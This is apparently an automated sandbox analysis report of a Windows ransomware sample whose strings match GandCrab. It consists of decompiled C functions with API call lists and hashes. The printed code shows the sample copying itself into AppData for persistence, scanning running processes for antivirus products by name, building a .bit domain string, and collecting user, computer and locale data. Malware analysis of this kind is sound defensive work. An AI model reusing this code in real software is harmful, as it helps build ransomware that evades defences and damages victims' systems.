                                        				GetModuleFileNameW(0, _t67, 0x100);
                                        				GetTempPathW(0x100, _t50);
                                        				_t6 =  &(_t50[1]); // 0x204
                                        				_t27 = E0FC68090(_t67, _t6);
                                        				_t75 = _t27;
                                        				if(_t27 == 0) {
                                        					_v20 = 0x520050;
                                        					_v8 = 0;
                                        					_push(0x52);
                                        					_v16 = 0x440049;
                                        					_v12 = 0x520055;
                                        					E0FC68150( &_v20, lstrlenW( &_v20)); // executed
                                        					_t72 = _t71 + 4;
                                        					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                        					_t13 =  &(_t50[1]); // 0x2
                                        					_t54 = _t67;
                                        					_t33 = E0FC68090(_t54, _t13);
                                        					__eflags = _t33;
                                        					if(_t33 == 0) {
                                        						lstrcatW(_t50, L"\\Microsoft\\");
                                        						lstrcatW(_t50,  &_v20);
                                        						lstrcatW(_t50, L".exe");
                                        						_push(_t54);
                                        						_t38 = E0FC62890(_v28, _t50); // executed
                                        						_t72 = _t72 + 4;
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							goto L17;
                                        						}
                                        						_t40 = lstrlenW(_t50);
                                        						__eflags = _v28;
                                        						_t56 = 0xa + _t40 * 2;
                                        						if(_v28 == 0) {
                                        							L13:
                                        							_t64 = 0;
                                        							__eflags = 0;
                                        							L14:
                                        							_push(_t50);
                                        							L15:
                                        							wsprintfW(_t64, L"\"%s\"");
                                        							_t57 = _t64;
                                        							goto L16;
                                        						}
                                        						__eflags = _v36 + _t56 - 0x800;
                                        						if(__eflags < 0) {
                                        							goto L14;
                                        						}
                                        						goto L13;
                                        					}
                                        					_t46 = lstrlenW(_t67);
                                        					__eflags = _v28;
                                        					_t58 = 0xa + _t46 * 2;
                                        					if(_v28 == 0) {
                                        						L8:
                                        						_t64 = 0;
                                        						__eflags = 0;
                                        						L9:
                                        						_push(_t67);
                                        						goto L15;
                                        					}
                                        					__eflags = _v36 + _t58 - 0x800;
                                        					if(__eflags < 0) {
                                        						goto L9;
                                        					}
                                        					goto L8;
                                        				} else {
                                        					_t57 = _t67;
                                        					L16:
                                        					E0FC62960(_t57, _t75); // executed
                                        					L17:
                                        					ExitThread(0);
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FC62AEA
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FC62B2C
                                        • GetTempPathW.KERNEL32(00000100,00000000), ref: 0FC62B38
                                        • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FC62B7D
                                          • Part of subcall function 0FC68150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC6816D
                                          • Part of subcall function 0FC68150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FC6819B
                                          • Part of subcall function 0FC68150: GetModuleHandleA.KERNEL32(?), ref: 0FC681EF
                                          • Part of subcall function 0FC68150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC681FD
                                          • Part of subcall function 0FC68150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6820C
                                          • Part of subcall function 0FC68150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68255
                                          • Part of subcall function 0FC68150: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC68263
                                        • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FC62B9C
                                        • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FC62BE4
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC62BEC
                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 0FC62BF4
                                        • wsprintfW.USER32 ref: 0FC62C35
                                        • ExitThread.KERNEL32 ref: 0FC62C47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                        • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                        • API String ID: 139215849-2398311915
                                        • Opcode ID: 9ba043500b92a56aee0f4f9cefbd933922ab91e78cbc24dabe1b7db6098bcf82
                                        • Instruction ID: 7d0177e6c6a9b2a6aa074c2e357f5fd39f73072abf407154c24f07de09e35eb1
                                        • Opcode Fuzzy Hash: 9ba043500b92a56aee0f4f9cefbd933922ab91e78cbc24dabe1b7db6098bcf82
                                        • Instruction Fuzzy Hash: 3341777120C311AFE704DF219C8BB9B77D9EFC4715F044428F656A62C2DA78D908CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 374 fc67a10-fc67aaa VirtualAlloc * 2 375 fc67ad2-fc67ada 374->375 376 fc67aac-fc67ac2 CreateToolhelp32Snapshot 374->376 377 fc67ac4-fc67acc VirtualFree 376->377 378 fc67add-fc67af7 Process32FirstW 376->378 377->375 379 fc67bcd-fc67beb VirtualFree FindCloseChangeNotification 378->379 380 fc67afd 378->380 381 fc67bf7-fc67bff 379->381 382 fc67bed-fc67bf5 VirtualFree 379->382 383 fc67b00-fc67b02 380->383 382->381 384 fc67ba7-fc67bab 383->384 385 fc67b08-fc67b0b 383->385 386 fc67bc5-fc67bcb 384->386 387 fc67bad-fc67bb3 384->387 388 fc67b10-fc67b1d lstrcmpiW 385->388 386->379 387->386 389 fc67bb5-fc67bc0 lstrlenW 387->389 390 fc67b1f-fc67b23 388->390 391 fc67b2a-fc67b38 388->391 389->386 390->388 394 fc67b25-fc67b28 390->394 392 fc67b4f-fc67b5e lstrcatW * 2 391->392 393 fc67b3a-fc67b4d lstrcpyW lstrcatW 391->393 395 fc67b60-fc67b84 lstrlenW 392->395 393->395 396 fc67b87-fc67b96 Process32NextW 394->396 395->396 396->384 397 fc67b98-fc67ba1 GetLastError 396->397 397->383 397->384
                                        C-Code - Quality: 80%
                                        			E0FC67A10(void** _a4, intOrPtr* _a8) {
                                        				signed int _v8;
                                        				long _v12;
                                        				long _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				WCHAR* _v28;
                                        				WCHAR* _v32;
                                        				WCHAR* _v36;
                                        				WCHAR* _v40;
                                        				WCHAR* _v44;
                                        				WCHAR* _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				WCHAR* _v60;
                                        				WCHAR* _v64;
                                        				WCHAR* _v68;
                                        				WCHAR* _v72;
                                        				WCHAR* _v76;
                                        				WCHAR* _v80;
                                        				void* _t46;
                                        				void* _t47;
                                        				void* _t49;
                                        				int _t50;
                                        				WCHAR* _t56;
                                        				int _t63;
                                        				void** _t68;
                                        				void* _t75;
                                        				long _t76;
                                        				WCHAR* _t77;
                                        				signed int _t79;
                                        				void* _t83;
                                        
                                        				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                        				_t68 = _a4;
                                        				 *_t68 = _t46;
                                        				_v80 = L"AVP.EXE";
                                        				_v76 = L"ekrn.exe";
                                        				_v72 = L"avgnt.exe";
                                        				_v68 = L"ashDisp.exe";
                                        				_v64 = L"NortonAntiBot.exe";
                                        				_v60 = L"Mcshield.exe";
                                        				_v56 = L"avengine.exe";
                                        				_v52 = L"cmdagent.exe";
                                        				_v48 = L"smc.exe";
                                        				_v44 = L"persfw.exe";
                                        				_v40 = L"pccpfw.exe";
                                        				_v36 = L"fsguiexe.exe";
                                        				_v32 = L"cfp.exe";
                                        				_v28 = L"msmpeng.exe";
                                        				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                        				_t75 = _t47;
                                        				_v24 = _t75;
                                        				if(_t75 == 0) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					 *_t75 = 0x22c; // executed
                                        					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                        					_v20 = _t49;
                                        					if(_t49 != 0xffffffff) {
                                        						_t79 = 0;
                                        						_push(_t75);
                                        						_v12 = 0;
                                        						_a4 = 0;
                                        						_v16 = 0;
                                        						_v8 = 0;
                                        						_t50 = Process32FirstW(_t49); // executed
                                        						if(_t50 != 0) {
                                        							L6:
                                        							while(_t79 == 0) {
                                        								_t77 = _t75 + 0x24;
                                        								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                        									_t79 = _t79 + 1;
                                        									if(_t79 < 0xe) {
                                        										continue;
                                        									} else {
                                        										_t79 = _v8;
                                        									}
                                        									L15:
                                        									_t75 = _v24;
                                        									_t63 = Process32NextW(_v20, _t75); // executed
                                        									if(_t63 != 0 && GetLastError() != 0x12) {
                                        										goto L6;
                                        									}
                                        									goto L17;
                                        								}
                                        								_push(_t77);
                                        								_push( *_t68);
                                        								_v16 = 1;
                                        								if(_a4 != 0) {
                                        									lstrcatW();
                                        									lstrcatW( *_t68, ",");
                                        								} else {
                                        									lstrcpyW();
                                        									lstrcatW( *_t68, ",");
                                        								}
                                        								_a4 =  &(_a4[0]);
                                        								_v12 = _v12 + lstrlenW(_t77) * 2;
                                        								_t79 =  >  ? 1 : _v8;
                                        								_v8 = _t79;
                                        								goto L15;
                                        							}
                                        							L17:
                                        							if(_v16 != 0) {
                                        								_t56 =  *_t68;
                                        								if( *_t56 != 0) {
                                        									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                        								}
                                        							}
                                        							 *_a8 = _v12;
                                        						}
                                        						VirtualFree(_t75, 0, 0x8000); // executed
                                        						FindCloseChangeNotification(_v20); // executed
                                        						_t76 = _v16;
                                        						if(_t76 == 0) {
                                        							VirtualFree( *_t68, _t76, 0x8000); // executed
                                        						}
                                        						return _t76;
                                        					} else {
                                        						VirtualFree(_t75, 0, 0x8000);
                                        						goto L3;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FC67A2D
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FC67AA1
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FC67AB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC67ACC
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0FC67AEF
                                        • lstrcmpiW.KERNEL32(0FC7033C,-00000024), ref: 0FC67B15
                                        • Process32NextW.KERNEL32(?,?), ref: 0FC67B8E
                                        • GetLastError.KERNEL32 ref: 0FC67B98
                                        • lstrlenW.KERNEL32(00000000), ref: 0FC67BB6
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC67BDB
                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0FC67BE0
                                        • VirtualFree.KERNELBASE(?,?,00008000), ref: 0FC67BF5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 1411803383-0
                                        • Opcode ID: e1226fe70a1c76f5b1dcb9721b75c98cf4228f0e80e7cd6e9f4e13e52a3be4be
                                        • Instruction ID: 278fe21af3b9dc21a011bb7cb0df838629c1faef1da3c9ca435f1a1d0a6a1610
                                        • Opcode Fuzzy Hash: e1226fe70a1c76f5b1dcb9721b75c98cf4228f0e80e7cd6e9f4e13e52a3be4be
                                        • Instruction Fuzzy Hash: B35182B1944319EBCB108F9AD88AB9D7BB4FF88725F104059E605BB281CB746915CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 fc65060-fc650d3 VirtualAlloc 399 fc6517f-fc65185 398->399 400 fc650d9-fc650e0 398->400 401 fc650e2-fc650ed 400->401 402 fc650ef-fc650f7 401->402 403 fc650f9-fc650fc 401->403 402->403 404 fc650fe-fc65103 Sleep 403->404 405 fc65109-fc65145 lstrlenW VirtualAlloc call fc64e90 lstrcmpiA 403->405 404->405 408 fc65147-fc6515a VirtualFree 405->408 409 fc6515c-fc6517d wsprintfW VirtualFree 405->409 408->401 409->399
                                        C-Code - Quality: 86%
                                        			E0FC65060() {
                                        				WCHAR* _v8;
                                        				intOrPtr _v12;
                                        				char* _v16;
                                        				char* _v20;
                                        				char* _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				char _v44;
                                        				char _v60;
                                        				short _v64;
                                        				char _v80;
                                        				WCHAR* _t26;
                                        				intOrPtr _t27;
                                        				void* _t30;
                                        				long _t32;
                                        				WCHAR* _t37;
                                        				void* _t39;
                                        				signed int _t40;
                                        				signed int _t41;
                                        				signed int _t45;
                                        				void* _t48;
                                        				WCHAR* _t49;
                                        				void* _t52;
                                        				void* _t53;
                                        
                                        				asm("movdqa xmm0, [0xfc704c0]");
                                        				_v24 =  &_v80;
                                        				asm("movdqu [ebp-0x4c], xmm0");
                                        				_v20 =  &_v60;
                                        				asm("movdqa xmm0, [0xfc704d0]");
                                        				_v64 = 0x6e;
                                        				asm("movdqu [ebp-0x38], xmm0");
                                        				_v44 = 0;
                                        				_v40 = 0x646e6167;
                                        				_v36 = 0x62617263;
                                        				_v32 = 0x7469622e;
                                        				_v28 = 0;
                                        				_v16 =  &_v40;
                                        				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4); // executed
                                        				_t37 = _t26;
                                        				_v8 = _t37;
                                        				if(_t37 != 0) {
                                        					_t40 = 0;
                                        					_t48 = 1;
                                        					_t45 = 0;
                                        					while(1) {
                                        						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
                                        						_t45 = _t45 + 1;
                                        						_v12 = _t27;
                                        						if(_t45 == 3) {
                                        							asm("sbb esi, esi");
                                        							_t48 =  ~(_t48 - 1) + 2;
                                        							_t45 = 0;
                                        						}
                                        						if(_t40 == 0xffffffff) {
                                        							Sleep(0x3e8); // executed
                                        						}
                                        						_t30 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4); // executed
                                        						_t39 = _t30;
                                        						_t41 = _t39; // executed
                                        						E0FC64E90(_t41, _v12, _t48); // executed
                                        						_t53 = _t53 + 4;
                                        						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
                                        						if(_t32 != 0) {
                                        							break;
                                        						}
                                        						VirtualFree(_t39, _t32, 0x8000); // executed
                                        						_t37 = _v8;
                                        						_t40 = _t41 | 0xffffffff;
                                        					}
                                        					_t49 = _v8;
                                        					wsprintfW(_t49, L"%S", _t39);
                                        					VirtualFree(_t39, 0, 0x8000);
                                        					_t26 = _t49;
                                        				}
                                        				return _t26;
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0FC650C6
                                        • Sleep.KERNEL32(000003E8), ref: 0FC65103
                                        • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FC65111
                                        • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FC65121
                                        • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FC6513D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6514E
                                        • wsprintfW.USER32 ref: 0FC65166
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC65177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                        • String ID: .bit$crab$fabian wosar <3$gand$n
                                        • API String ID: 2709691373-4182624408
                                        • Opcode ID: 1c81a74af8e06631adf22ad03023476d8a6b95ebe680a25985c3a19e85b5981e
                                        • Instruction ID: 2edbc14b0f9c90f8024c9e715ef33eda3137c4c6396016704709556d29e4e3d4
                                        • Opcode Fuzzy Hash: 1c81a74af8e06631adf22ad03023476d8a6b95ebe680a25985c3a19e85b5981e
                                        • Instruction Fuzzy Hash: DF31C871E04305ABD700CFA5DC87B9E7BB8EF44715F100125F746B6281D77456008B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0FC639F0: GetProcessHeap.KERNEL32(?,?,0FC64637,00000000,?,00000000,00000000), ref: 0FC63A8C
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                          • Part of subcall function 0FC67330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                          • Part of subcall function 0FC67330: GetComputerNameW.KERNEL32 ref: 0FC67390
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                          • Part of subcall function 0FC67330: wsprintfW.USER32 ref: 0FC673F1
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                          • Part of subcall function 0FC67330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                          • Part of subcall function 0FC67330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                          • Part of subcall function 0FC67330: RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6465C
                                        • lstrcpyW.KERNEL32 ref: 0FC6467F
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64686
                                        • CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6469E
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646AA
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646B1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: Global\
                                        • API String ID: 3131499543-188423391
                                        • Opcode ID: 324df26290ae99c3357ef31ee863873b036ab39477a6643b79d2adfbd90427f1
                                        • Instruction ID: 96f8bc3fc03f9fe4b1a49c6e273b256d4f4d3e807cf5cdc01a40e5bafe9be030
                                        • Opcode Fuzzy Hash: 324df26290ae99c3357ef31ee863873b036ab39477a6643b79d2adfbd90427f1
                                        • Instruction Fuzzy Hash: 162135312683117BE228A725DC8BF7F765CDB40B15F500628F706660D1AED8B918C7E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC67C10(intOrPtr* __ecx) {
                                        				int _t20;
                                        				intOrPtr* _t24;
                                        
                                        				_t24 = __ecx;
                                        				if( *__ecx != 0) {
                                        					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                        					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                        				}
                                        				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                        					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                        				}
                                        				return _t20;
                                        			}

                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C29
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C3B
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C4D
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C5F
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C71
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C83
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C95
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67CA7
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67CB9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67CD1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 498ac34a1a87bc658a4c0164eb5c5b9222f13b51b5c2603dca27c68d1c1b786f
                                        • Instruction ID: 0b8e7829fe30d854d750837dccb17a85898d18ccbc0e62e4919cf6ef7df393e6
                                        • Opcode Fuzzy Hash: 498ac34a1a87bc658a4c0164eb5c5b9222f13b51b5c2603dca27c68d1c1b786f
                                        • Instruction Fuzzy Hash: 6921DD30244B04FAE7762A15DD4BF96B6E1BF40B09F654828E2C2248F18FF57599EF08
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E0FC62890(WCHAR* __ecx, intOrPtr __edx) {
                                        				long _v8;
                                        				intOrPtr _v12;
                                        				void* _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t9;
                                        				signed int _t14;
                                        				void* _t18;
                                        				void* _t19;
                                        				void* _t23;
                                        				struct _SECURITY_ATTRIBUTES* _t24;
                                        				WCHAR* _t29;
                                        				void* _t34;
                                        				signed int _t35;
                                        				long _t37;
                                        				void* _t38;
                                        				void* _t40;
                                        
                                        				_t29 = __ecx;
                                        				_t28 = 0;
                                        				_v12 = __edx;
                                        				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
                                        				_t34 = _t9;
                                        				if(_t34 == 0xffffffff) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					_v8 = GetFileSize(_t34, 0);
                                        					E0FC63030(0, _t34, _t35); // executed
                                        					asm("sbb esi, esi");
                                        					_t37 = (_t35 & 0x00000003) + 1;
                                        					_t14 = E0FC63030(0, _t34, _t37);
                                        					asm("sbb eax, eax");
